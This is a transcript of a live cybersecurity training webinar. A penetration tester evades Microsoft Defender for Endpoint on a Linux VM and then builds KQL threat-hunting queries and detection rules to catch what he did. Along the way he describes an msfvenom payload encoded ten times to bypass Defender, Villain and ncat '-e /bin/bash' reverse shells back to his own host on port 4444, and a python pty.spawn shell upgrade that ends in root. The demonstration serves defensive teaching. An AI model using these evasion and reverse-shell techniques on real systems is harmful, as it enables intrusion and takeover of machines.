Hello, everyone. Jeremy Nathan here with JN Training Incorporated. We also have Chris Small with JN Training here. Thanks for joining. Our company here, we instruct computer classes in person and remotely. And we set up this meetup group to spread the knowledge of different IT skills, ranging from cybersecurity to data analysis and everything in between. So thanks again for joining. And we have Logan Hillard, expert cybersecurity and penetration tester. Okay, go for it, Logan. Thank you.
Yep. Thanks, guys. Thanks for the intro again. My name is Logan Hillard. I'll be instructing this short presentation today. I am the owner of a small business called LNG Technologies, and we do a bunch of really just anything, consultation, training, a lot of it. I'm going to jump in and just get started. And our conversation today is essentially going to cover, hopefully this will come up here. Our conversation today is going to cover some fairly complex topics, but I'm going to try to break it down as easy as possible. If you guys have questions, feel free to post them in chat or just let us know. All right, by speaking up. So we're going to talk about how good Windows Defender is. I've been doing some very basic testing. I have a lot more testing to do, but I wanted to see really like how this EDR, Microsoft 365 Defender, stacked up against other solutions out there, right? CrowdStrike, Cylance, Sentinel-1, the lot of them. So I put it through its paces to a degree, right? Again, nothing crazy, but I just want to show you guys real world how this kind of works. So I'm going to open up my local Kali box. And what I'm going to do here is I'm going to create a binary, a malicious binary. I'm going to move that binary executable to the target machine, which is a Linux VM that's running in Azure that is defended by with Windows Defender already running. Let's actually validate that just so that nobody can say that I didn't do everything properly. Let me kind of show you what I'm talking about here. There's a couple of different commands that you can run once you have all of this installed, Windows Defender. And I think this is actually MDATP, stands for Microsoft Defender Advanced Threat Protection. It's their older name for their tool, but it still exists in the commands. And as long as you get back these as true, as long as you get output saying these are true, this is essentially showing that the tool is working correctly. There's another command to validate your ID, but I'm not going to show that because it is sensitive. And this kind of validates that the tool is running as expected. Let me run another command here. This is essentially going to perform a test to validate that the EDR is working as expected, and it should create an alert. This may take a couple minutes. This is one of those things where even local seams have the same issue. But because this is the cloud, that's kind of where some of the downtime is going to come from. So I'm going to perform another function really quick while we wait and build out um, the exploit for us really fast. So one way that we're going to do this, I just need to make sure, pretty sure this is mine. One way that we're going to do this is we're going to validate a standard malicious binary. This binary that I'm going to create with MSF Venom is very basic. It has no encoding techniques. We're not really even trying to bypass anything here, but we are going to attempt to. We're going to see how Windows Defender handles this, okay? So let me go back to my Linux VM, grab the IP address real quick so I can log in. And there is a lot of things going on here. So if I get caught up on something, apologies. It may take me a second to figure stuff out. So what I need to do is I need to move this over. Here we go. So I'm going to say SCP go, and then so this is live, so just be aware of that if I make mistakes, that's why I'm making those mistakes. I am going to be doing all this in the moment, real world. Okay, so what I'm trying to do here is basically move that file over from my attacker machine, my Kali machine here, and I'm trying to move it over to the victim. All right, with SSH, I should be able to move it, and it should just show up on the other side. But It doesn't, right? And so some of us may be like, well, you did something wrong, right? You failed. Nope, everything worked as expected, including the security tool. So if we go back to our alerts, we can actually validate that we did get an alert for that. We might have two alerts now. Let's validate that. We may have the alert that we ran before, the curl command that I ran, as well as this new one that I just uploaded. So we only have the curl command at the moment. This is kind of what the test file malware kind of looks like. It'll say informational because there's nothing actually happening in terms of um, there's no threat, right? The threat is basically a null because it's already been blocked. But what's cool about Defender is that it shows you everything. It shows you way more than you could probably realistically handle, especially as like a junior. But you can really dive into the information by looking at the timeline. This really shows you not only what happened, but also what happened before and what happened after that thing was observed to have occurred. Right. So there's again so much information here. It even lines up with some of your MITRE attack techniques, which are really cool. So what's awesome about that is that especially as a blue team that's trying to implement MITRE across your entire design, Defender just supports that out of the box. You don't even have to try, which is really cool. Then there it is. So we got, and the severity increased on this one to low because the get shell that is calling out here, this get shell backdoor was a valid attack. This is actually something that again, it was blocked, it was prevented. You can see that there. So I have active blocking enabled for Defender. So it doesn't just alert, it actually blocks. And this is happening on Linux. So Windows Defender on Linux is handling at this level, which is pretty good. We're going to see where it kind of fails here in a second, where it kind of falls short a little bit. But it has a low severity status because it thinks that something is actually going on here, right? What I tried to do was a lot scarier than um, than what, let's say, um, than what maybe the EI car did, right? The EI car was just that first initial alert was just something that was just like, not a big deal, right? It's expected behavior to a degree. This isn't necessarily expected, but since it was prevented, the severity was low. So it saw it, it prevented it, it categorized it as low. We can handle it, right? We can manage that alert. We can look at the timeline, understand it generally as a blue teamer, and move about our day, right? Threat stopped, right? Threat ended. That's great for us. Okay. Now, let's try something a little bit different here. And I am going to delete the Linux elf here. And what I want to do is I want to create go to my other one here. And essentially I want to create this file again, but I want to encode it. So I'm going to be using a encoding technique called Shikata. There are only a few of these that I know that work with MSF Venom, but encoding techniques generally are used to bypass things, right? If you can encode something, it looks different. Okay. And the way I catch something is based off of signature. A signature is just a string. So if I can see something that happens and I know that that is malicious, that's what I catch on. That's what I block. We're done. Right. If I encode it, especially if I encode it 10 times, which is what I've done here, it's going to be more difficult for you to validate that string. Right. You kind of have to work backwards to do that. So let me go ahead and send this traffic along again. I'll do SCP. I'm going to call the new name the evil bin that I created here. And again, I am doing all this real world, so just a heads up. That's why everything's going to take a little while.
Logan, sorry to interrupt.
Yes.
Were you showing a Linux code just when you said to run the code? Because we see your Microsoft 365 Defender. Or were you doing Linux code on another
Oh, here, sorry.
screen?
Let me try sharing again.
All right, thanks.
Let's do screen and then screen 2. That should be better. There we go. Okay. Perfect. So now that we basically we've moved this file over, right? We moved this file over with SCP. We moved it to our target machine. This is the target machine over here. Once we run ls, we can actually see the evil bin is there. Right? So now that the evil bin is there, it did not get caught, first of all. So I encoded the malicious binary, and it was able to not get caught by the Defender platform. All right, so that's kind of a big deal. We've already bypassed Defender to a degree. We need to run it. Executing is different than moving. Executing is different than copying data to a hard drive. So once we execute it, it has another opportunity to catch. All right. So what we're going to do here is we're going to say, um, let's go ahead and open up MSF console. And MSF console is going to be our suite of tools that we use to catch this reverse shell. All right. So we're going to say search multi-handler. Pretty sure this is going to be use 5, show options, set payload. I need to be using the exact same payload that I used to create the binary. Show options, set L host. This is going to be 168.1.93. Show options. All right, now we're going to run this, and this is basically our listener, and he's just ready to go. All right, now the other part that I can't show you here is I need to set up a port forwarding rule. This won't take me too long, but I have to make a change in my router because this is actually happening over the internet. All right, there are no there's nothing fake about this presentation. Everything is actually going to happen as if it was a real attack. So I am going over the internet. I have a port forwarding rule on my router, and hopefully we'll be able to catch this. So let's try to chmod the evil binary. We're going to run the binary. And what we hope to happen is that on our other side, we hope to catch this reverse shell. Now, it does not seem to have gone through. 4444, pretty sure all this is correct. Let me just validate. Oh, there it goes. So it did work. We got the stager to catch, and now if I run a command, I have a command execution. So I am on this other box. You can see the host name is the Linux VM 002, and that is the Linux machine over here. So I currently have a reverse shell that is actively connected to my attacker box. This basically means that an attacker has taken over control of your system and nothing's been blocked. Let's go back to the alerts here and see if we get something new. I'm pretty sure this one is not going to show up, and it is because it is an encoded string. Okay, that encoded binary is basically all that it took for us to bypass Defender. Now, this is not good, right? Generally, Defender, this is a pretty low level of validation. Defender should be able to catch this. These binaries, these techniques specifically, are extremely well known. But again, this is just one of those things where sometimes it'll work, sometimes it won't. Maybe if it was only a few levels of encoding, it would have caught it. But since I did 10 levels of encoding, maybe that's what brought us over the hump, right? It can be difficult to say without really thorough testing on exactly what's happening. But Defender, from my viewpoint here, Defender not really living up to what they need to be doing. Now, again, there's so many variables here, right? Like this is on Linux. Would this happen on Windows? Hard to say, right? Windows, they probably have a better understanding of their operating system, and so on Linux, it may be a little bit more complicated to kind of design these tools. It's probably a completely different team, right? They have completely different signatures. Everything's just a little bit different. I'm sure that's a complication. Other EDRs don't support Linux at all. So when you take that into account, this is actually pretty good. At least it's doing something. Remember, the security is not just a single blanket solution to fix everything. Security is cybersecurity is defense in depth. So EDR is just one part of that conversation. Very important part. This is still a really good utility, but it is interesting to note that with a little bit of encoding, we can easily bypass this EDR platform. All right. So we're going to try something else, and I want to show you guys another walkthrough here. Control C out of this, RM the binary, clear that up, and then I'm going to jump out of MSF console. And now what I'm going to do here is I'm actually going to utilize a new tool. I'm actually going to exit out of this, going to opt, and then say villain to the villain.py. So we need to say Python 3 villain. And basically what I'm going to be using now is a newer tool. This tool specifically is actually pretty awesome. Um, the interesting part about it is that it works very, very well. Some of these techniques that we're using now um, are not actually going to be that useful real world, but this one will be. This is one of those things where um, it's a pretty big difference. All right. So let me kind of show you what this process looks like. We're going to run the help command. Then we're going to say generate. We're going to say help generate. Again, always using my help commands here. Then I need the payloads, which are which are located in villain core payload templates. Opt villain core cd payload templates cd linux. Okay, and then hoax shell, and then I want probably the sh curl.py. I think I'll do that. Sh curl, that should be fine. Sh curl. So it's going to look basically just like this. Should work. All right. So then we're going to say essentially right click, and then I'm going to say lhost is going to be an IP address. So it's going to be it needs to be my external IP. Give me 1 second. Let me grab that. And because this is real world, I'm actually going through all the motions here. Oops. Equals. ETH0, that's what I was looking for. That's going to be host payload. That should be good. Manually, no worries. So I'm going to grab this code. And what's fun about this is that essentially, whenever I have code, if I'm not running something that is, if I'm not running something that is a binary, right? If I'm not running an executable on the system, then it only runs in memory. So this is actually a bypass technique by running something as code. It's very similar to running a PowerShell script versus PowerShell code. PowerShell code is going to actually bypass a lot of EDRs because it expects it in a script. It's much easier to block a script, but is it easy to block code? Not necessarily. Now let's see if this works here. Now I'm going to go back to my Kali box, and it says backdoor session established. So we say help, and we say backdoors, right? And then we can say backdoor, then we say the session ID. See, it shell. There we go. Boom, and there we are. ID, and then host name. So I've taken over the system, and again bypassed EDR and gain access to the terminal. So as an attacker, again, you would actually be using this to take over systems, right? You would try to run a reverse shell on the target through whatever means necessary to get access to that target on a terminal so that you can run more commands, take over the system, look for goodies, look for data, right? Try to exfiltrate information that matters, sensitive content, and go from there, right? I'm gonna refresh one more time just to make sure that it hasn't seen anything, and it looks like EDR is still bypassed. Now, this is the fun part about this platform. This is the part that goes a little bit above and beyond, in my opinion, because of how simple these things are. Okay. So I'm going to take you into basically advanced blue teaming now, and we're going to start talking about threat hunting. Threat hunting is essentially a process where you can find things that are currently in your environment, right? You're assuming that there are currently attackers looking for active exploits, looking for active reverse shells, active data exfiltration techniques, active bypass attempts, and by understanding what the red teamers are doing, what the attackers do, as a blue teamer, you can search for that stuff, right? So I'm going to load up this advanced hunting. I've already done this previously because I'm not that great at KQL. That's Jeremy's thing. But by using some really basic KQL queries, I can search across all of my devices. I know I only have one in my environment, but this would work across all devices. And I can actually search for a process command line that contains NoHub. Now, again, is this a command that everyone is going to be using? Not necessarily, right? This isn't necessarily how every attack would look, but it does look like villain always uses NoHub. For whatever reason, the last time I did this too, it used NoHub at the beginning of this script as well. You can see it right there. Now, I've never used NoHub. Is this going to be something good to catch on every single time? Maybe not. Maybe so. It's kind of hard to say. All right. Maybe you just want to catch on curl or something, but people actually use curl. So if you use something like NoHub, something that I've never really seen before, used before, even if you catch something that isn't malicious, you can at least look into it. So I know for a fact, as a blue teamer, that villain uses NoHub, right? That's easy to validate because that's what it uses. I just used it. So I could run this query and I could say, cool, did it find anything? It did. It did indeed, right? So it found this process created. And that did happen today, just now, basically, I believe. Let's look into this. Oh, this might have been actually last night while I was testing. So I'm not even sure it's caught this one, but this is the one from last night. Let me try running this one more time. Okay, so it's going to take a little while for this to actually to pop up. Again, as everything feeds in the cloud, it takes a couple minutes, probably up to 5 minutes. And regardless, you can see that it basically catches on this technique, right? And so it sees the no-hup output text. So even though I was able to run this and catch the shell, it still caught it. But after I looked for it, it doesn't know that this is malicious. That's the thing. That's the whole deal. Is that it doesn't understand that this is a malicious attempt. All right. So let me do this one more time here. There it is. That's the latest one. So there's the process that got created just now. All right. And here you can actually see the entire string of text here. See all that there? So that's exactly the command that I actually ran to take over this victim. Right. And it doesn't know that this is malicious still. It's confused. It understands what happened. It can validate what happened based off your search, but it doesn't mean that it knows it's malicious. So how do we fix that? Well, we can create a detection rule. And I've already done this because again, this is kind of a little bit of a process. But I'm going to show you kind of what this detection rule looks like. All right. So essentially, I don't have any actions that are going to be triggered, and I have the rule currently off. But essentially, I set everything. I set the severity. I give it a name. I even give it minor attack techniques and impacted entities, and what the action should be, even if it does catch this. So technically, if this is caught somewhere, I can push changes to that device with this detection rule. So if I see this on a device and I want to lock that device down, no problem. Defender can handle that. um, I don't know of any other tool that is capable of doing that with no effort. And that is the level of effort that I had to put into this to make this work. It took me almost no effort. And that is kind of the implementation side of things that makes Defender so great. You don't actually have to implement the SOAR backend abilities that Defender brings to the table. SOAR being the automated remediation utilities that are used on the cybersecurity side. I don't have to do any of that. I just spin it up, install the agent on the target, and then use the tool. And if the tool is set up properly and the rules are set up properly, it will actually do the things that you want it to do. So I'm going to turn this on. Okay, there goes the detection rule. So it's on. And then I'm not going to make any actions because you can basically take the machine offline pretty easily. And I don't want to have to revert from that. So I could make actions. I'm not going to in this presentation because it just makes everything a little bit more complicated. But I am going to run it here. So it does kind of get scheduled to run. You can see it running down here. This will take a little while, but what happens is once that detection rule runs, it will actually create an alert based off that detection. which is really the whole point of this, right? I want my SOC analysts to be able to see things that are malicious. Is something that is running no hut malicious? Maybe not, but from what I've seen, probably. Right. Again, if you guys are Linux experts, feel free to let me know if you ever use that utility. But I've never ran that command before. It may be some other string that I would actually want to detect on. Maybe I have a senior developer that uses NoHub all the time. Okay, well, yeah, that user I could probably just take out of the conversation and not really worry about it. But here, let's see if we've gotten this alert back. Look at that. So we have it's already in its own category. I set that up based off my detection rule. You can see that the source is from a custom detection rule, and you can see all the assets, the activity, and then of course I can go and do a deep dive on it. Right? Let's look at it in the timeline, and you can see exactly when it was ran. You can see the villain reverse shell, defense evasion, bash created process no hup, bash created the process clear, evil bin was deleted after execution. So look, a deletion, I removed a file, and that was actually caught by Defender, which is really interesting. So it is able to kind of do a lot more than it seems, right? You can see valid account login, application layer protocol file ingress with SCP. So it captures all this stuff, and you can alert on all this as well. All this is kind of captured in this timeline and in the alerts in the overview of the machine. It's really nice how much information it gives you. It makes all this very very easy. Let's go ahead and dive into this alert specifically so we can take a look at it. And this gives you a little bit more information on exactly what happened. And as you can see, it does it in a pretty broad timeline. If it thinks that these are kind of connected, you see how I saw this at 11:13. This is the EI car from before. This is just the test that we ran. This is it thinks that these are somehow connected. This might be the same attacker, so it adds them into the same timeline, right? Which is really interesting. You can see the query results from the KQL query that I ran. And then you can also just do a little bit more of a deep dive here. You can link the alert to other incidents. You can submit the item to Microsoft employees for review, which does cost money, I think, but you can get an expert to come in and kind of help you out in case it's a really big deal. And again, this rule is just a KQL query, right? This is just an advanced threat hunting query that I ran just once. I just ran a KQL statement. I was able to create a detection rule based off that KQL statement. I was able to then create alerts based off what it found off that KQL statement, even on historical information. This is not everything from the detection rule onwards. This is even stuff from before the detection rule was created. So I can look at everything historically up to a certain amount of time. I believe it's 30 days by default, if I'm not mistaken. All right. You can probably increase that. So this allows someone like a threat hunter, which is more like a senior blue teamer, to create threat hunting rules to help the organization and the SOC analyst specifically stay on top of the environment, right? Because again, are the tools perfect? No. Do we need to be trying our best and basically adding as many things as possible to try to help defend the organization? Yes. And this is how we can do it. We can perform threat hunting. I want to show you one more here because this one is kind of interesting. I'm actually going to do, I think this was the new query. 4 hours. And actually, I probably need less than that because I think I ran this last night. It'll be fine. So we'll run this query, and you can see I was messing with this last night. But essentially, this is a really basic reverse shell that should 100% be blocked. 100% be blocked. But it just isn't. Let me clean this up really quick. Exit, and then help backdoors kill, and then I call the session ID. So this will eliminate the reverse shell from my VM because I don't want that to stay there. All right, so backdoors, cool. Exit, and that was a nice little villain conversation. All right. So now what I'm going to do is something even more basic. This is 100%. This should be caught, no matter who you are. I'm sorry, it doesn't matter. You should be catching this. Shame on Microsoft for not understanding that this is a problem um, and catching this just by default. Let me change my forwarding rule here. Firewall NAT. Second. So I'm gonna change my forwarding rule over, and then I should be able to forward this along. But essentially, all we're going to be using here, and this is something that is very basic for anyone who's done, um, anyone who's worked on, um, how do you say, like really just any CTF, anything on the red team side of things, doing some cybersecurity training. These are this is a process that basically everyone uses. And so it is almost always malicious. I mean, I don't know of a scenario when this is not malicious unless you're just testing. All right. So we're going to, um, we have our listener open on Kali. So basically, this is just a listener. It's saying, hey, if something comes in on 4444, accept it. That's really all it's saying. And then over here on my Linux box, I'm going to say ncat-e bin bash. So essentially what I'm saying here is I want to execute bin bash, which is just a shell, and I'm going to send it over the internet. Right. So the internet is going to be, or my target here basically, be and then on 444. Okay. So let's see if this works here. We go back to our listener and nothing yet. I wonder if I have I did not create a detection rule from what I understand or from what I remember. And even if I did, it should be off. This one is off. Yep. Okay, so it shouldn't be alerting on it. Pretty sure. Again, okay, yeah. So it didn't see it, but it also didn't get caught. Oh, just kidding. There we go. All right, so there we go. So we were able to send ourselves a reverse shell, and again, this is not encoded. There's nothing weird about this. This is very easy to understand. And again, this is the level of difficulty that we'd have to get into honestly to catch this. All we'd have to say is run query. Anything that has a dash e with a slash bin, that's malicious 9.9 times out of 10. 99.9% of the time, I can't even think of a scenario where it wouldn't be malicious. But you can see that here in a second at least, it'll catch um, this new finding, right? And it'll actually be able to show us, that another one happened. We'll look at one of the old ones here for a second while the other one loads up. But you can essentially see that it's able to determine, exactly what happened. It just doesn't think that it's malicious. So if it doesn't think it's malicious, we can just create a detection rule. And then again, that's what I've already done that here on this custom detection rule here. I can turn this on, all right? And then I will run this in the environment. I think this one actually might be a little bit different. Let me make sure. Yeah, this one's actually different here. Let's just call it dash e bin, and then I will run this query here. And I think this is this one right here. Yep, this one here at the bottom. So that one's actually the newest one that just had. Oh no, that was before actually. That was on April 12th. So still hasn't caught that new one. I don't believe. Yeah, so all that was from yesterday. So again, I was able to make a pop yesterday. It may just be taking a little while for whatever reason. But again, you can have access to being able to find things. And what happens is once it finds that thing, it's able to alert on it, right? So now we have a possible reverse shell here. This one actually might have gotten, which one is this one? Reverse shell. Okay, so let's see. I think this one actually might have been detected now. I'm unsure. What's weird is that it was allowed. So again, these are real tools, and so I am working with them literally in the moment. See, I still have access. Um, can I? Let's see. Who am I? So I am the ID. Let's do sudo dash I. I can't. I need to upgrade my shell. So let's say I had the password for whatever reason. Let me just kind of show you. Let's see if it actually catches any of this. This will be interesting. Dash C import pty pty dot spawn bash, and then we'll throw that out there. Okay, and look at that. Already root. So uh, on this, with this setup here, I was able to immediately become root. And honestly, I didn't even I didn't even put in a password. I'm not even sure how that works, to be honest. I think it was because the user account already had put in a password recently over here, and because this is really where the reverse shell is, that's how it determined that I didn't need to put in a password. So I'm already root. I've taken over this machine completely owned the box from top to bottom, and basically none of this was blocked. Did it see it? I think so. I think it actually did see it, but it didn't block it. So again, um, EDR is extremely important. If you're not doing EDR here at all, if you're not actually validating or monitoring your environment, you're not really performing cybersecurity properly. Just to say that, a little bit bluntly, because if you're not monitoring, how do you know what's happening? If you can't see all of your devices, at the very least, if you don't have a threat hunting utility in your environment, how do you know what's happened? If something drops, if a 0 day comes out and you don't have someone watching cybersecurity news and implementing alerts and detection rules for the latest and greatest in the cybersecurity landscape, how are you going to block everything that happens, right? The next time that Windows has a really big vulnerability against it, how are you going to stop that? How are you going to proactively prevent it rather than just respond to it as an incident? That's kind of the difference between not doing cybersecurity properly and doing it properly. This tool here, again, I've shown some of the pitfalls, but again, this is true for any EDR. Once you find all the bypasses, it's no longer an issue. It's not difficult. You just have to find the bypasses first. Okay. So that's kind of my presentation. I know that was a little bit technical. It might have been a little bit too technical, but I just wanted to show some of the details, the finer details on how these tools work and really how effective they are real world. And even here, this is still kind of a test. But I did do some things that were real. I even upgraded a shell. Um, I don't know if it actually caught that, but that is pretty cool. Greg, did you have a question there?
Yeah, I just wanted a little bit of clarification on the line right underneath the sudo command
Oh,
when
okay,
you're upgrading the shell. Yeah, right there, Python 3, that line. You
right.
could just explain exactly what you did to get to the root.
Yeah, 100%. Great question. So this line here is utilized to upgrade your shell. Whenever you utilize Netcat, it's a very basic shell. It's known as what's known as a dumb shell, and because it's so basic, it literally has no features. And by no features, I mean nothing. This was actually my terminal there for a second before I upgraded my shell, and this is a very basic way to upgrade your shell and works on almost any platform because Python is so ubiquitous. So I can run Python 3-C and then basically have Python call bin bash, and I get access to a bin bash terminal. Whereas before I was just running this garbage shell that didn't really do anything. Once I run this command, you can see I have a lot more access. It looks more like a terminal, and that's really what we're looking for.
Interesting. Okay. 'Cause
Logan,
I have a little bit of experience with Linux scripting, very minute Python, so I guess it's a good idea to brush up on Python.
Right? Yeah, and again, it's like if someone's calling bin bash or maybe even spawning something, maybe I could alert on this, right? Maybe this is something where I could say, okay, well, let's go back into our queries and try to alert on something like this. And let's say, I don't know, I'm going to copy some of this here to my new one. Again, it's really nice that once you have something working, you can just kind of copy paste everywhere. But let's look for maybe the pty.spawn. I mean, this seems a little bit abnormal. That one does not see it. Let me see, because
You
I
could do this
just
for
ran it.
several different shots, right? Like corn shell or yeah, so forth. You could do this for different shots as well, right?
Right, for sure. Like you could use bin bash, you could use born again, you could use really any shell that you want. But bin bash is so ubiquitous that it makes sense. Python 3 with bin bash, almost every single system is gonna work with that scenario.
All right, thank you.
Yep, the great question. I don't see it popping up here, but this is how I would kind of search for it. I just have to do a little bit of digging probably to figure out exactly how to catch the KQL query um, on the upgrade process, and then I would actually be able to have a threat hunting rule looking for people trying to upgrade their shell. Because again, this is a malicious process. Nobody does this like on their own. Now, do people use spawn with with Python? Maybe, but if they do, our SOC analysts can look into it. That's fine. No big deal. Call it a false positive, right? There we go. So hopefully that makes sense. Great questions there, Greg. Really appreciate it. Yeah, Jeremy, question?
Yeah, so I've heard that some companies have Python blocked from being able to run on their systems. So if Python was blocked, then that command would not work.
Correct. And let's actually look at a scenario where that would happen. I'm going to run exit, and the exit command doesn't actually. Well, maybe it does. Let me fire this off again. Oh, ID. Okay, so now we're back in, and let's say that this machine does not have Python. So there is another command that we can always use. There's always a failback or fallback, whatever you want to call it. This one's called. This one's a little bit weird. Dev slash null, I believe. Dash Q. Yeah. There we go. So now I have a fully functional shell on the other device. It does act a little bit weird. You can see I'm typing in the command and then it spits the command back out again. That's because it's not fully upgraded, but this process still works even without Python. So again, great example there where you're like, well, can I find it elsewhere? Is there a way for me to? And that's exactly what a threat hunter would be doing, right? We would be trying to find ways around our own tools so that we can create rules to detect for those potential attacks. That's exactly what you would be doing. You'd be looking at real world research. You'd be utilizing red team experience. You'd be interacting with resources, maybe other cybersecurity researchers, to validate what's happening real world so I can create advanced threat hunting KQL queries to find those things in my environment. And again, this isn't just against the one machine. If I had hundreds of machines, this KQL query would still run against all of them and still spit out information. Might take a little bit longer, but that's another great part about this. There's no real quote unquote implementation. You just install the agent. The agent gets onboarded. There's a little bit of a process there. It's not that hard. If anyone wants any support on that, let us know. And then you just have access to all of these tools. It's amazing. It's like a SIEM and a SOAR combined all in the cloud that's already in Azure. So if you're already using Microsoft, man, I'm telling you, this is one of the best tools that you can utilize. You will need to probably get someone on the threat hunting side of things, but this is easy. You can get started very easily with some of these queries over here on the left. There are community queries already built into this platform. So it's very easy to get started. There's a lot of really good training out there on the internet directly from Microsoft that makes this process really easy. I'm going to stop sharing here because this is kind of the end of my presentation. But I just want to kind of wrap up here. Just remember that, if you ever need any support on this, this is a quickly growing field. These technologies are quite new. There's not a lot of training out there, but we've put in a lot of work. Jeremy, Chris, and I have really put in a lot of work to understand these technologies and kind of take this to the next level. So we are available for consultation or just for training purposes. If you guys need any additional training, just reach out. Right. I'm going to put my LinkedIn here in chat, as well as my email. And you guys can feel free to follow me or seriously just shoot me an email directly. I can help support. I will often help people for free, but if it becomes a bigger engagement, we'll talk after that. Okay. But as an instructor, this is something that I am really interested in. This technology speaks to me for some reason because it kind of allows me to have the red team and the blue team at the same time. And again, it's super easy, really easy to get
Also,
into.
uh, sorry, before I let you go,
Yeah.
is there any way you can give me a link to the YouTube channel
Oh
for
yeah,
the recording and any other training documents?
for
Pretty
sure.
pretty new for in this field, but have a little bit of exposure to the technology, just not
Yeah.
how to use them.
So, Jeremy, if you could post our YouTube channel, we'll probably be adding some more stuff to YouTube, and it'll be covering these things. I want to go. I want to get even more expert on some of the stuff, so I'm going to go into even more detail, and I also want to have some stuff that's even easier than this. So, kind of on both sides, this is kind of right down the middle of where I want to be. Um, so we will focus more on that. If you're looking for cyber training, red team training, reach out to me on LinkedIn, and I will shoot you a few a few resources. Okay, that's how we can handle that.
Perfect. Thank you.
Yeah, of course, no worries. Great questions, Greg. I really appreciate you stopping by, and hope you got something out of this.
I'll
Of
stop the
course.
recording here.
Cool. Thanks.